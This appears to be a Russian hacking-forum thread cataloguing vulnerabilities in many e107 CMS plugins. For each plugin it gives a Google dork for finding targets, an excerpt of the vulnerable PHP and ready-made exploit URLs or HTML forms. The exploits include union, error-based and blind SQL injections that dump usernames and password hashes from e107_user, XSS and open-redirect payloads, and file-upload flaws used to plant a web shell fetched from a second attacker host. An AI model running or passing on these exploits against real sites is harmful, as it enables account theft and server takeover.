Не знаю было или не, но пишу: скачал Plugins > E-Commerce > Notice Board на plugins.e107.org [скачать] Author sunout Date 13:10 14-May-10 дорк: inurl:e107_plugins/nboard e107_plugins/nboard/viewads.php PHP: require_once("../../class2.php"); require_once(e_HANDLER."form_handler.php"); require_once(e_HANDLER."userclass_class.php"); @include_once(e_PLUGIN."nboard/languages/".e_LANGUAGE.".php"); $ns = new e107table; require_once(HEADERF); require_once("classmen.php"); $uspage = e_BASE; $scat = $_GET['scat']; $act = $_GET["act"]; //==================================Debug======================================= if ($act == "det"){ $text .="<table>"; $sql -> db_Select("nb_gnl", "*", "gnl_id='$scat' "); while($row = $sql -> db_Fetch()){ $gnl_id = $row['gnl_id']; $gnl_name = $row['gnl_name']; $gnl_city = $row['gnl_city']; $gnl_picbig=$row['gnl_picbig']; $gnl_small = $row['gnl_picsmall']; $gnl_detail = $row['gnl_detail']; $gnl_user = $row['gnl_user']; $gnl_phone = $row['gnl_phone']; $gnl_email = $row['gnl_email']; $gnl_date = $row['gnl_date']; $gnl_price = $row['gnl_price']; $gnl_kikoz = $row['gnl_kikoz']; /*...*/ ////вывод где то там } $text .="</table>"; $caption = NB_NAME_6; $ns -> tablerender($caption, $text); require_once(FOOTERF); екплоенг: Code: http://localhost/e107/e107_plugins/nboard/viewads.php?act=det&scat=1%27%20and%200%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13--+ условие mg=0ff e107_plugins/nboard/nboard.php PHP: /*...*/ $cat = $_GET['cat']; $scat = $_GET['scat']; $page = $_GET["page"] /*...*/ //====================== all_select ============================// function sql_cat($onpage, $page, $cat, $table){ $begin = $page*$onpage; // откуда начинать $sql = "SELECT * FROM ".$table." 
WHERE gnl_scatid in (select subcat_id from ".MPREFIX."nb_subcat where subcat_catid=$cat) ORDER BY gnl_id DESC LIMIT ".$begin.", ".$onpage; $result_cat = mysql_query($sql) or die(mysql_error()); return $result_cat; echo $result_cat; } /*...*/ $onpage = 40; // записей на страницу $table = "".MPREFIX."nb_gnl"; // из какой таблицы $page = page(); // определяем страницу $result = sql_result($onpage, $page, $table, $gnl_pigbig); $result_cat = sql_cat($onpage, $page, $cat, $table, $gnl_pigbig); $result_scat = sql_scat($onpage, $page, $scat, $table, $gnl_pigbig); /*...*/ Здесь никаких условий уже не нужно: $cat подставляется в запрос без кавычек, поэтому magic_quotes_gpc не мешает. Кстати, это подзапрос, то есть из него надо выходить закрывающей скобкой. Текст ошибки MySQL отдаётся клиенту напрямую (or die(mysql_error())), поэтому работает error-based извлечение через дубликат ключа (группировка по floor(rand(0)*2)) — искать место вывода union-результата в шаблоне не обязательно. В файле есть ещё одна SQL-инъекция, но для неё нужен magic_quotes_gpc=Off. Запарился добиваться вывода и копать дальше => по наблюдению автора, если в nb_cat нет ни одной записи, уязвимость неэксплуатируема. У кого есть желание — смотрите. Короче, через ошибку: Code: http://localhost/e107/e107_plugins/nboard/nboard.php?cat=1%29%20and%201=%28select%201%20from%20%28select%20count%28*%29%20from%20%28select%201%20union%20select%202%20union%20select%203%29x%20group%20by%20concat%28%28select%20%20concat_ws%280x3a,user_loginname,user_password%29%20from%20e107_user%20limit%200,1%29,0x3a,floor%28rand%280%29*2%29%29%29y%29--+
1 pXSS nlstart uploaded EasyShop v1.54 26Aug10 скачать http://[host]/[path]/e107_plugins/easyshop/easyshop_sql.php - стурктура БД плагина /e107_plugins/easyshop/easyshop_basket.php PHP: /*...*/ // Filling basket from product = P; return to product overview if ($_POST['fill_basket'] == 'C' or $_POST['fill_basket'] == 'P') { // refresh_cart(); // IPN addition // might screw up the session variables // IPN addition - sets two variables to help keep coding neat later on isset($_POST['item_id'])? $action_id=$_POST['item_id']: NULL; isset($_SESSION['shopping_cart'][$action_id]['item_track_stock']) && ($_SESSION['shopping_cart'][$action_id]['quantity']) < ($_SESSION['shopping_cart'][$action_id]['item_instock'])? $allow_add = TRUE: $allow_add = NULL; isset($_SESSION['shopping_cart'][$action_id]['item_track_stock'])? $track_stock = TRUE: $track_stock = NULL; // Fill the basket with selected product if (!array_key_exists($_POST['item_id'], $_SESSION['shopping_cart'])) { // Key for item id does not exists; item needs to be added to the array $_SESSION['shopping_cart'][$_POST['item_id']] = array('item_name'=>$_POST['item_name'], 'quantity'=>$_POST['item_qty'], 'item_price'=>$_POST['item_price'], 'sku_number'=>$_POST['sku_number'], 'shipping'=>$_POST['shipping'], 'shipping2'=>$_POST['shipping2'], 'handling'=>$_POST['handling'], 'db_id'=> $_POST['db_id']); // Handling costs are calculated once per each basket $_SESSION['sc_total']['handling'] += (double)$_POST['handling']; // IPN addition - check to see if we're tracking stock, if so put stock amount into SESSION ARRAY if ($_POST['item_track_stock'] == 2){ $_SESSION['shopping_cart'][$_POST['item_id']]['item_instock'] = $_POST['item_instock']; $_SESSION['shopping_cart'][$_POST['item_id']]['item_track_stock'] = $_POST['item_track_stock']; } } else if (!isset($track_stock) || isset($allow_add)){ // IPN addition check quantity against item_instock // Key for item id does exist; only quantity needs to raised 
$_SESSION['shopping_cart'][$_POST['item_id']]['quantity'] += $_POST['item_qty']; } if (!isset($track_stock) || isset($allow_add)){ // IPN addition - don't increment if quantity is at max stock level // Fill the sc_total array $previous_nr_of_items = $_SESSION['shopping_cart']['item_id']['quantity']; // Fix bug #88 $_SESSION['sc_total']['items'] += $_POST['item_qty']; $_SESSION['sc_total']['sum'] += (double)$_POST['item_price'] * $_POST['item_qty']; // Extra shippings costs are conditioned (only calculate for first product) if ((integer)($_SESSION['shopping_cart'][$_POST['item_id']]['quantity']) >= 1 and $previous_nr_of_items == 0) { // Fix bug #81 $_SESSION['sc_total']['shipping'] += (double)$_POST['shipping']; } // PayPal charges shipping2 costs for all items above quantity of 2 if ((integer)($_SESSION['shopping_cart'][$_POST['item_id']]['quantity']) > 1) { if ($previous_nr_of_items == 0) { $_SESSION['sc_total']['shipping2'] += (double)$_POST['shipping2'] * ($_POST['item_qty']-1); } else { $_SESSION['sc_total']['shipping2'] += (double)$_POST['shipping2'] * $_POST['item_qty']; } } } // Close the session (before a location redirect: otherwise the variables may not display correctly) session_write_close(); // Return to original url header("Location: ".$_POST['return_url']); exit(); } HTML: <form name="" action="http://e107/e107_plugins/easyshop/easyshop_basket.php" method="post"> <input name="fill_basket" type="hidden" value="C"> <input name="return_url" type="hidden" value="data:text/html;base64,PHNjcmlwdD5hbGVydCgxMjMpPC9zY3JpcHQ+"> <input type="submit" value="Send"> </form> PS: 5 минут поиска! Примечание: по сути это открытый редирект — return_url без какой-либо проверки уходит в заголовок Location. XSS через data:-URL сработает только в браузерах, которые ещё разрешают переход верхнего уровня на data: (современные его блокируют); редирект на произвольный внешний адрес работает в любом случае. Отдельно стоит отметить, что item_price, item_qty, shipping и handling берутся прямо из POST и суммируются в $_SESSION['sc_total'] — клиент сам задаёт цену корзины; доходит ли это до реальной оплаты, по приведённому фрагменту не видно.
FileDownload Advanced v2.0 by The Hunter скачать гугл- inurl:e107_plugins/FileDownload http://[host]/[path]/e107_plugins/FileDownload/filedownload/upload.php PHP: require_once("config.php"); require_once("functions.php"); if ($_GET["dir"]) $dir = $_GET["dir"]; else $dir = $_POST["dir"]; if ($_POST["numfiles"]) $numfiles = $_POST["numfiles"]; else $numfiles = 4; if ((isset($_POST["hide"])) and (isset($dir))) { for ($x = 1; $_POST["file".$x]; $x++) { $file = $_POST["file".$x]; $copy = copy($file,$dir."/".getFileName($file)); $upload_ok .= "<tr><td style='width:100%' colspan=8 class='header2'>Uploaded:" . getFileName($file) . " successfully.</td></tr>"; } } ./config.php PHP: //$expPrefPass=''; $expBaseDir='../'; $expSortOrder=0; $expDisplaySearch... Как видно, первая строка закомментирована (пароль не задан). ... ./functions PHP: require_once("config.php"); if (isset($_COOKIE["phpFileDownload_login"])) if ($_COOKIE["phpFileDownload_login"] != $expPrefPass) header ("location: login.php");... И посему никакой переадресации нет, если куку просто не устанавливать: проверка выполняется только при наличии куки. (В показанном фрагменте после header() не видно exit(), так что даже с неверной кукой выполнение, возможно, продолжается — уточните по полному файлу.) ...function getFileName ($file) { $strlen = strlen($file); $retfile = ""; while ($strlen > 0) { $_g = substr(substr($file, $strlen, strlen($file)), 0, 1); if (($_g == "\\") or ($_g == "/")) break; $retfile = substr($file, $strlen, strlen($file)); $strlen = $strlen-1; } return $retfile; }... getFileName оставляет от $file только хвост после последнего / или \, но $dir не проверяется вообще — можно указать любой каталог, в который может писать веб-сервер (в том числе через ../). Для copy() с http://-источником нужен allow_url_fopen=On; цикл останавливается на первом пустом file$x. Результат: Заливаем на хостинг шелл или отдаём со своего расшаренного. Посылаем запрос: <form action="http://[host]/[path]/e107_plugins/FileDownload/filedownload/upload.php" method=post> <input type=hidden name=hide value=0><br> <input type=text name="file1" value='http://[host2]/[path]/shell.php'><br> <input type=text name=dir value=log><br> <input type=submit> </form> Наш шелл: http://[host]/[path]/e107_plugins/FileDownload/filedownload/log/shell.php PS: другие способы заливки. TiltViewer v1.2 by The_Death_Raw Если установлен, то повезло. скачать Заливаем шельца! 
гугл- inurl:e107_plugins/tiltviewer http://[host]/[path]/e107_plugins/tiltviewer/gestion_fichiers.php PHP: ...// fonction upload foreach ($_FILES["filez"]["error"] as $key => $error) { if ($error == UPLOAD_ERR_OK) { $tmp_name = $_FILES["filez"]["tmp_name"][$key]; $name = $_FILES["filez"]["name"][$key]; move_uploaded_file($tmp_name, "./uploads/$name"); Header("Location: ".$_SERVER['PHP_SELF'].""); }... Имя файла ($name) берётся из запроса как есть — ни расширение, ни путь не проверяются. Выбираем наш шелл и Send the files http://[host]/[path]/e107_plugins/tiltviewer/uploads/name_our_shell.php PS: заходил под админом и тогда лил; нужны ли права на самом деле, по фрагменту не видно (проверки доступа в нём нет), но может пригодиться. Другие способы заливки. AACGC Hall of Shame v1.6 by ~M@CH!N3~ 07:27 02-Apr-10 скачать Blind SQL inj гугл- inurl:e107_plugins/aacgc_hos [path]/e107_plugins/aacgc_hos/HOS_Details.php PHP: ...require_once("../../class2.php"); require_once(HEADERF); if (e_QUERY) { $tmp = explode('.', e_QUERY); $action = $tmp[0]; $sub_action = $tmp[1]; $id = $tmp[2]; unset($tmp); } //------------------------------------------------------------------------------------------------------------ $text .= "<center><table style='width:90%' class='indent' cellspacing='' cellpadding=''>"; $sql->db_Select("aacgc_hos", "*", "WHERE hos_id = $sub_action",""); $row = $sql->db_Fetch();... Плюс — никаких условий: $sub_action подставляется без кавычек. Минус — надо знать существующий hos_id (это целое число, так что его можно просто перебрать). Поскольку e_QUERY режется по точке, точек в payload быть не должно. Результат: пусть hos_id=1 и MySQL ветки 5: http://[host]/[path]/e107_plugins/aacgc_hos/HOS_Details.php?.1 and substring(version(),1,1)=5 - есть контент! http://[host]/[path]/e107_plugins/aacgc_hos/HOS_Details.php?.1 and substring(version(),1,1)=4 - нет контента! (Файл называется HOS_Details.php — на регистрозависимой ФС написание HOS_details.php не сработает.) PS: с "+" контент не выводился (если пихать в GET).
Проверял только на 0.7.22 и 0.7.23. Автор называет это «не совсем уязвимостью», но по сути это хранимая XSS: атрибут onload из тега [img] попадает в итоговый <img> без фильтрации, и в нём исполняется произвольный JS, а не только редирект. Можно запороть любой комментарий, будь то на форуме, в ЛС, в комментарии к пользователю или к новости — достаточно вставить Code: [img onload=document.location.href=0x687474703a2f2f676f6f676c652e7275]http://host/e107_images/generic/bbcode/image.png[/img] 0x687474703a2f2f676f6f676c652e7275 — это «http://google.ru» в hex (так обходится запрет на кавычки); вставить можно что угодно. Обратите внимание: в JS литерал 0x… — число, а не строка, так что как именно именно этот payload приводит к переходу, по описанию не видно; суть в том, что в onload выполняется произвольный код. ©by sw3n
AACGC Friend System v.1.1 - плагин e107 скачать с plugins.e107.org inurl:/e107_plugins/aacgc_friendsys/ Path disclosure (раскрытие полного пути, требуется display_errors = On) PoC Code: http://[host]/[path]//e107_plugins/aacgc_friendsys/admin_menu.php http://[host]/[path]/e107_plugins/aacgc_friendsys/User_Friend_List_menu.php SQL inj: нужен magic_quotes_gpc = Off (значение в кавычках) и нужно быть авторизованным (блок под if (USER)). /e107_plugins/aacgc_friendsys/Friend_Requests.php PHP: /*...*/ if (USER){ if ($pref['fl_enable_gold'] == "1") {$gold_obj = new gold();} /*...*/ if (isset($_POST['accept_user'])){ $newuser = $_POST['user_id']; $newfriend = $_POST['user_friends']; /*...*/ $sql->db_Insert("aacgc_friend_sys", "NULL, '".$newuser."', '".$newfriend."'") or die(mysql_error()); /*...*/ Обратите внимание на db_Insert ниже: в строковой форме $arg вставляется в INSERT как есть, экранировать обязан вызывающий код — а плагин этого не делает, user_id и user_friends уходят в запрос в сыром виде. Ошибка MySQL при этом печатается (or die(mysql_error())), чем и пользуется error-based PoC ниже. /e107_handlers/mysql_class.php PHP: /*...*/ function db_Insert($table, $arg, $debug = FALSE, $log_type = '', $log_remark = '') { $table = $this->db_IsLang($table); $this->mySQLcurTable = $table; if(is_array($arg)) { $keyList= "`".implode("`,`", array_keys($arg))."`"; $valList= "'".implode("','", $arg)."'"; $query = "INSERT INTO `".MPREFIX."{$table}` ({$keyList}) VALUES ({$valList})"; } else { $query = 'INSERT INTO '.MPREFIX."{$table} VALUES ({$arg})"; } if(!$this->mySQLaccess) { global $db_ConnectionID; $this->mySQLaccess = $db_ConnectionID; } if ($result = $this->mySQLresult = $this->db_Query($query, NULL, 'db_Insert', $debug, $log_type, $log_remark )) { $tmp = mysql_insert_id($this->mySQLaccess); return ($tmp) ? $tmp : TRUE; // return true even if table doesn't have auto-increment. 
} else { $this->dbError("db_Insert ($query)"); return FALSE; } } /*...*/ PoC Code: <form action=http://[host]/[path]/e107_plugins/aacgc_friendsys/Friend_Requests.php method=post> <input name=user_id type=text value="1',(select count(*) from (select 1 union select 2 union select 3)x group by concat((select concat_ws(':',user_loginname, user_password) from e107_user limit 0,1 ),floor(rand(0)*2))))#"> <input type=submit name=accept_user value=Send> </form> SQL inj (здесь кавычки не нужны — $sub_action подставляется как число), но надо быть авторизованным. /e107_plugins/aacgc_friendsys/AddMe.php Code: require_once("../../class2.php"); require_once(HEADERF); if (e_QUERY) { $tmp = explode('.', e_QUERY); $action = $tmp[0]; $sub_action = $tmp[1]; $id = $tmp[2]; unset($tmp); } if (USER){ $sql->db_Select("aacgc_friend_sys", "*", "WHERE user_id = ".USERID."",""); $row = $sql->db_Fetch(); $sql2 = new db; $sql2->db_Select("user", "*", "WHERE user_id = $sub_action ",""); $row2 = $sql2->db_Fetch(); print_r($row2); //---------------------------------------------- /*...*/ $text .= "<center> <form method='POST' action='AddMe.php?det.".$row2['user_id']."'> <table style='' class='indent'><tr> <td> <input type='hidden' name='user_friends_request' value='".USERID."'> <input type='hidden' name='user_id' value='".$row2['user_id']."'> </td> </tr> <tr> <td> <i>Are You Sure You Want To Add</i> <b>".$row2['user_name']."</b> <i>To Your Friends List?</i> "; /*...*/ В файле остался отладочный print_r($row2): он выводит всю выбранную строку целиком, так что результат union сразу виден на странице (плюс второй столбец ещё и подставляется в форму как user_name). $sub_action — второй элемент после explode('.'), поэтому точек в payload быть не должно. Число столбцов (31) соответствует таблице user той версии e107, на которой тестировал автор; при другой версии подберите заново. PoC: Code: http://[host]/[path]/e107_plugins/aacgc_friendsys/AddMe.php?0.1%20and%200%20union%20select%201,concat_ws%280x3a,user_loginname,user_password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31%20from%20e107_user%20limit%200,1
AACGC Wish List http://plugins.e107.org/ (примечание: все пути ниже относятся к aacgc_pnews — плагину Public News, который разобран и ниже; заголовок, по-видимому, ошибочен.) SQL Injection: /News_Details.php PHP: ... $sql ->db_Select("aacgc_pnews", "*", "WHERE news_id = ".$sub_action."",""); ... Пример: Code: http://e107/e107_plugins/aacgc_pnews/News_Details.php?det.-42%20union%20select%201,concat_ws(0x3a,user_loginname,user_password),3,4,5,6,7,8%20from%20e107_user%20limit%200,1 /News.php PHP: ... $sql ->db_Select("aacgc_pnews_cat", "*", "WHERE news_cat_id = ".$sub_action."",""); $row = $sql ->db_Fetch(); $newscatid = $row['news_cat_id']; ... $sql2->mySQLresult = @mysql_query("select * from ".MPREFIX."aacgc_pnews where news_cat=".$newscatid." ORDER BY news_date DESC;"); ... Здесь, помимо прямой инъекции через $sub_action, значение news_cat_id из результата первого запроса без кавычек подставляется во второй — через union им можно управлять, так что второй запрос тоже инжектируем (second-order). Пример: Code: http://e107/e107_plugins/aacgc_pnews/News.php?det.-2%20union%20select%201,concat_ws(0x3a,user_name,user_password),3%20from%20e107_user Путь (раскрытие полного пути при display_errors=On): http://e107/e107_plugins/aacgc_pnews/e_latest.php http://e107/e107_plugins/aacgc_pnews/e_status.php http://e107/e107_plugins/aacgc_pnews/pnews_singlecat_menu.php Дорк: inurl:e107_plugins/aacgc_pnews/ Если боян — извиняйте.
AACGC Arcade Addons V3.3 SQL Injection: /Category.php PHP: ... if (e_QUERY) { $tmp = explode('.', e_QUERY); $action = $tmp[0]; $sub_action = $tmp[1]; $id = $tmp[2]; unset($tmp);} ... $sql->mySQLresult = @mysql_query("SELECT * FROM ".MPREFIX."arcade_categories WHERE cat_id = $sub_action"); ... Пример: Code: http://e107games.net/e107_plugins/aacgc_arcade_addins/Category.php?det.-1%20union%20select%201,2,3,4,5,6-- Путь: http://e107/e107_plugins/aacgc_arcade_addins/Alternate_Arcade_Main_menu.php http://e107/e107_plugins/aacgc_arcade_addins/Arcade_Champ_menu.php http://e107/e107_plugins/aacgc_arcade_addins/Arcade_Favorites_menu.php http://e107/e107_plugins/aacgc_arcade_addins/Challenge_Champ_menu.php etc... Дорк:inurl:e107_plugins/aacgc_arcade_addins/ Если боян - извиняйте.
AACGC CMMS v1.2 Необходимы права администратора, SQL Injection: /admin_edit_cat.php PHP: ... if (e_QUERY) { $tmp = explode('.', e_QUERY); $action = $tmp[0]; $id = $tmp[1]; unset($tmp); } ... $sql->db_Select("aacgc_bt_cat", "*", "cat_id = $id"); ... $sql->mySQLresult = @mysql_query("SELECT * FROM ".MPREFIX."arcade_categories WHERE cat_id = $sub_action"); ... (Последняя строка с arcade_categories, судя по всему, скопирована из разбора Arcade Addons выше — к этому плагину она, скорее всего, не относится; уязвимый запрос здесь — db_Select по $id.) Пример: Code: http://e107/e107_plugins/aacgc_btracker/admin_edit_cat.php?edit.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password)%20from%20e107_user-- SQL Injection (прав администратора не требует — проверки доступа в фрагменте нет): /Bracket_Details.php PHP: ... if (e_QUERY) { $tmp = explode('.', e_QUERY); $action = $tmp[0]; $sub_action = $tmp[1]; $id = $tmp[2]; unset($tmp); } ... $sql->db_Select("aacgc_bt_cat", "*", "WHERE cat_id=$sub_action",""); ... Пример: Code: http://e107/e107_plugins/aacgc_btracker/Bracket_Details.php?det.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password)%20from%20e107_user-- Путь (раскрытие полного пути при display_errors=On): http://e107/e107_plugins/aacgc_btracker/admin_menu.php Дорк: inurl:e107_plugins/aacgc_btracker/
AACGC Tracker V1.2 Необохдимы права администратора, SQL Injection: /admin_edit_cat.php PHP: ... if (e_QUERY) { $tmp = explode('.', e_QUERY); $action = $tmp[0]; $id = $tmp[1]; unset($tmp); } ... $sql->db_Select("aacgc_tracker_cat", "track_cat_id, track_cat_name", "track_cat_id = $id"); ... Пример: Code: http://e107/e107_plugins/aacgc_tracker/admin_edit_cat.php?edit.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password)%20from%20e107_user-- SQL Injection: /Tracker.php PHP: ... if (e_QUERY) { $tmp = explode('.', e_QUERY); $action = $tmp[0]; $sub_action = $tmp[1]; $id = $tmp[2]; unset($tmp); } ... $sql->db_Select("aacgc_tracker", "*", "WHERE track_cat=$sub_action",""); ... Пример: Code: http://e107/e107_plugins/aacgc_tracker/Tracker.php?det.-1%20union%20select%201,2,3,concat_ws(0x3a,user_name,user_password),5,6%20from%20e107_user-- SQL Injection: /Tracker_Details.php PHP: ... if (e_QUERY) { $tmp = explode('.', e_QUERY); $action = $tmp[0]; $sub_action = $tmp[1]; $id = $tmp[2]; unset($tmp); } ... $sql3->db_Select("aacgc_tracker", "*", "WHERE track_id=$sub_action", ""); ... Пример: Code: http://e107/e107_plugins/aacgc_tracker/Tracker_Details.php?det.-1%20union%20select%201,2,3,concat_ws(0x3a,user_name,user_password),5,6%20from%20e107_user-- Путь: http://e107/e107_plugins/aacgc_tracker/admin_menu.php Дорк:inurl:e107_plugins/aacgc_tracker/
AACGC MIA List V1.3 Необохдимы права администратора, SQL Injection: /admin_edit.php PHP: ... if ($action == "edit") { $sql->db_Select("aacgc_mialist", "*", "WHERE mia_id=$id",""); $row = $sql->db_Fetch(); $sql2 = new db; $sql2->db_Select("user", "*", "WHERE user_id=".$row['mia_user']."",""); $row2 = $sql2->db_Fetch(); $sql3 = new db; $sql3->db_Select("user", "*"); $rows = $sql3->db_Rows(); for ($i=0; $i < $rows; $i++) { $option = $sql3->db_Fetch(); $options .= "<option name='mia_user' value='".$option['user_id']."'>".$option['user_name']."</option>";} ... Пример: Code: http://e107/e107_plugins/aacgc_mialist/admin_edit.php?edit.-1%20union%20select%20concat_ws(0x3a,user_name,user_password),2222,3333%20from%20e107_user%20limit%200,1-- Вывод внизу в исходнике Путь: http://e107/e107_plugins/aacgc_mialist/MIA_List_menu.php http://e107/e107_plugins/aacgc_mialist/admin_menu.php Дорк:inurl:e107_plugins/aacgc_mialist/
AACGC Trophy Room V1.5 Необохдимы права администратора, SQL Injection: /admin_edit_event.php PHP: ... if (e_QUERY) { $tmp = explode('.', e_QUERY); $action = $tmp[0]; $id = $tmp[1]; unset($tmp); } ... if ($action == "edit") { $sql->db_Select("aacgc_trophy_room", "*", "event_id = $id"); $row = $sql->db_Fetch(); ... Пример: Code: http://e107/e107_plugins/aacgc_trophy_room/admin_edit_event.php?edit.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4,5%20from%20e107_user-- SQL Injection: /Event_Details.php PHP: ... if (e_QUERY) { $tmp = explode('.', e_QUERY); $action = $tmp[0]; $sub_action = $tmp[1]; $id = $tmp[2]; unset($tmp); } } ... $sql->db_Select("aacgc_trophy_room", "*", "WHERE event_id = $sub_action",""); $row = $sql->db_Fetch(); ... Пример: Code: http://e107/e107_plugins/aacgc_trophy_room/Event_Details.php?det.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4,5%20from%20e107_user-- Путь: http://e107/e107_plugins/aacgc_trophy_room/admin_menu.php Дорк:inurl:e107_plugins/aacgc_trophy_room/
AACGC Clan Listing V2.0 Необходимы права администратора, SQL Injection: /admin_edit.php PHP: ... $sql->db_Select("clan_listing", "*", "ORDER BY clan_id ASC",""); while($row = $sql->db_Fetch()){ $sql2->db_Select("clan_listing_cat", "*", "WHERE clan_cat_id=".$row['clan_cat']."",""); ... (В приведённом фрагменте в запросы попадают только значения из БД, а не из e_QUERY — место, куда доходит edit.-1, здесь не показано; PoC ниже по этому листингу не подтверждается, проверяйте по полному файлу.) Пример: Code: http://e107/e107_plugins/clan_listing/admin_edit.php?edit.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4,5,6%20from%20e107_user-- SQL Injection: /Clans.php PHP: ... if (e_QUERY) { $tmp = explode('.', e_QUERY); $action = $tmp[0]; $sub_action = $tmp[1]; $id = $tmp[2]; unset($tmp); } ... $sql->db_Select("clan_listing_cat", "*", "WHERE clan_cat_id=$sub_action",""); $catname = $sql->db_Fetch(); ... Пример: Code: http://e107/e107_plugins/clan_listing/Clans.php?det.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4,5,6%20from%20e107_user-- Путь (раскрытие полного пути при display_errors=On): http://e107/e107_plugins/clan_listing/admin_menu.php Дорк: inurl:e107_plugins/clan_listing/
AACGC Product Listing V1.4 SQL Injection: /Product_Sub_Categories.php PHP: ... if (e_QUERY) { $tmp = explode('.', e_QUERY); $action = $tmp[0]; $sub_action = $tmp[1]; $id = $tmp[2]; unset($tmp); } ... $sql->db_Select("product_listing_subcat", "*", "WHERE product_cat=$sub_action ORDER BY product_subcat_name ASC",""); while($row = $sql->db_Fetch()){ ... Пример: Code: http://e107/e107_plugins/product_listing/Product_Sub_Categories.php?det.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3%20from%20e107_user-- SQL Injection: /Products.php PHP: ... if (e_QUERY) { $tmp = explode('.', e_QUERY); $action = $tmp[0]; $sub_action = $tmp[1]; $id = $tmp[2]; unset($tmp); } ... $sql->db_Select("product_listing", "*", "WHERE product_cat=$sub_action",""); ... Пример: Code: http://e107/e107_plugins/product_listing/Products.php?det.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4%20from%20e107_user-- Путь: http://e107/e107_plugins/product_listing/Product_Listing_menu.php http://e107/e107_plugins/product_listing/admin_menu.php Дорк:inurl:e107_plugins/product_listing/
AACGC Item List V1.4 SQL Injection: /Item_List.php PHP: ... if (e_QUERY) { $tmp = explode('.', e_QUERY); $action = $tmp[0]; $sub_action = $tmp[1]; $id = $tmp[2]; unset($tmp); } ... if ($action == "det"){ $sql2->db_Select("aacgc_itemlist_cat", "*", "WHERE item_cat_id=$sub_action",""); $row2 = $sql2->db_Fetch(); ... Пример: Code: http://e107/e107_plugins/aacgc_itemlist/Item_List.php?det.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3%20from%20e107_user-- SQL Injection: /Item_SubCategories.php PHP: ... if (e_QUERY) { $tmp = explode('.', e_QUERY); $action = $tmp[0]; $sub_action = $tmp[1]; $id = $tmp[2]; unset($tmp); } ... if ($action == "det"){ $sql2->db_Select("aacgc_itemlist_subcat", "*", "WHERE item_subcat_id=$sub_action",""); ... Пример: Code: http://e107/e107_plugins/aacgc_itemlist/Item_SubCategories.php?det.-1%20union%20select%201,2,concat_ws(0x3a,user_name,user_password),4%20from%20e107_user-- Путь: http://e107/e107_plugins/aacgc_itemlist/admin_menu.php http://e107/e107_plugins/aacgc_itemlist/Recent_Items_menu.php http://e107/e107_plugins/aacgc_itemlist/Random_Item_menu.php Дорк:inurl:e107_plugins/aacgc_itemlist/
AACGC Public News V1.4 SQL Injection: /News.php PHP: ... if (e_QUERY) { $tmp = explode('.', e_QUERY); $action = $tmp[0]; $sub_action = $tmp[1]; $id = $tmp[2]; unset($tmp); } ... $sql ->db_Select("aacgc_pnews_cat", "*", "WHERE news_cat_id = ".$sub_action."",""); ... Пример: Code: http://e107/e107_plugins/aacgc_pnews/News.php?det.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3%20from%20e107_user-- SQL Injection: /News_Details.php PHP: ... if (e_QUERY) { $tmp = explode('.', e_QUERY); $action = $tmp[0]; $sub_action = $tmp[1]; $id = $tmp[2]; unset($tmp); } ... $sql ->db_Select("aacgc_pnews", "*", "WHERE news_id = ".$sub_action."",""); $row = $sql ->db_Fetch(); ... Пример: Code: http://e107/e107_plugins/aacgc_pnews/News_Details.php?det.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4,5,6,7,8%20from%20e107_user-- Путь: http://e107/e107_plugins/aacgc_pnews/pnews_singlecat_menu.php http://e107/e107_plugins/aacgc_pnews/pnews_menu.php http://e107/e107_plugins/aacgc_pnews/pnews_category_menu.php http://e107/e107_plugins/aacgc_pnews/pnews_archive_menu.php http://e107/e107_plugins/aacgc_pnews/e_latest.php http://e107/e107_plugins/aacgc_pnews/counter.php etc... Дорк:inurl:e107_plugins/aacgc_pnews/
AACGC Donation Listing V1.7 Необходимы права администратора, SQL Injection: /admin_edit_donator.php PHP: ... if (e_QUERY) { $tmp = explode('.', e_QUERY); $action = $tmp[0]; $id = $tmp[1]; unset($tmp); } ... if ($action == "edit") { $sql->db_Select("donation_listing", "*", "WHERE don_id= $id",""); $row = $sql->db_Fetch(); ... Пример: Code: http://e107/e107_plugins/donation_listing/admin_edit_donator.php?edit.-1%20union%20select%201,2,database(),4,5,6 Необходимы права администратора, SQL Injection: /admin_edit_month.php PHP: ... if (e_QUERY) { $tmp = explode('.', e_QUERY); $action = $tmp[0]; $sub_action = $tmp[1]; $id = $tmp[2]; unset($tmp); } ... if ($action == "edit") { $sql->db_Select("donation_listing_month", "month_id, month_name, year", "month_id = $id"); $row = $sql->db_Fetch(); $sql2 = new db; $sql2->db_Select("donation_listing_year", "*"); $rows = $sql2->db_Rows(); for ($i=0; $i < $rows; $i++) { $option = $sql2->db_Fetch(); $options .= "<option name='year' value='".$option['year_id']."'>".$option['year_name']."</option>";} ... Пример: Code: http://e107/e107_plugins/donation_listing/admin_edit_month.php?edit.-1%20union%20select%201,database(),3 Путь: http://e107/e107_plugins/donation_listing/Current_Donations_menu.php http://e107/e107_plugins/donation_listing/Latest_Donations_menu.php http://e107/e107_plugins/donation_listing/admin_menu.php Баги никому не нужные, но всё же..
Election v0.5 SQL Injection: /election.php (election_class.php) PHP: ... $candidatelist = $dao->getCandidateList($election->getId()); ... if ($sql->db_Select("user", "user_id, user_name, user_login")) { while ($row = $sql->db_Fetch()) { $owners[] = array($row["user_id"], $row["user_name"]." (".$row["user_login"].")"); } ... (Приведённый фрагмент не показывает, где параметр из e_QUERY попадает в запрос — уязвимый код, вероятно, в getCandidateList/получении $election; по листингу PoC не подтверждается, смотрите election_class.php целиком.) Пример: Code: http://e107/e107_plugins/election/election.php?1.-1%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16%20from%20e107_user-- Путь (раскрытие полного пути при display_errors=On): http://e107/e107_plugins/election/admin_menu.php http://e107/e107_plugins/election/e_comment.php http://e107/e107_plugins/election/e_search.php Дорк: inurl:e107_plugins/election/
